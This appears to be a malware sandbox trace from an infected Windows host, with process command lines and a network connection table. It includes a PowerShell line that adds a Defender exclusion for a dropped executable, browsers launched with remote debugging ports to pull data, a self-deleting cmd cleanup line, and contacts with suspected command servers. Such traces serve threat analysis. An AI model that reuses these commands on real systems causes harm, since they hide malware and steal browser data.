C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\8SgVdVfj\Anubis.exe""
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_5848_133856936207227123\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xdc,0xe0,0xd4,0xd8,0x104,0x7ff80cf9cc40,0x7ff80cf9cc4c,0x7ff80cf9cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2040,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2036 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1872,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2056 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2276 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4540,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4568 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4700 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4304,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4656 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4308,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5104 /prefetch:8
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4664,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5092 /prefetch:8
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:8
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5052,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5172 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5316,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5336 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5324,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5304 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4928,i,8258268185607914036,3790390111347797027,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:2
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff812d046f8,0x7ff812d04708,0x7ff812d04718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2128,749190989360635923,7117521668000021800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108250101\3c78f9f7e6.exe
"C:\Users\Admin\AppData\Local\Temp\10108250101\3c78f9f7e6.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108260101\ca0811c1a0.exe
"C:\Users\Admin\AppData\Local\Temp\10108260101\ca0811c1a0.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\ab82191a65.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 680 -ip 680
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 812
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\vk6xl" & exit
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10108280101\99c35316e6.exe
"C:\Users\Admin\AppData\Local\Temp\10108280101\99c35316e6.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Users\Admin\AppData\Local\Temp\10108290101\a7e917a2f7.exe
"C:\Users\Admin\AppData\Local\Temp\10108290101\a7e917a2f7.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 2.18.66.80:443 | www.bing.com | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | joyfulhezart.tech | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
| US | 8.8.8.8:53 | www.dropbox.com | udp |
| GB | 162.125.64.18:443 | www.dropbox.com | tcp |
| US | 8.8.8.8:53 | biochextryhub.bet | udp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 104.21.68.89:443 | biochextryhub.bet | tcp |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| US | 104.21.9.123:443 | moderzysics.top | tcp |
| DE | 5.75.210.149:443 | | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | ls.t.goldenloafuae.com | udp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 104.86.110.232:80 | e5.o.lencr.org | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| FI | 95.217.27.252:443 | ls.t.goldenloafuae.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.180.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 172.217.169.65:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.178.10:443 | ogads-pa.googleapis.com | udp |
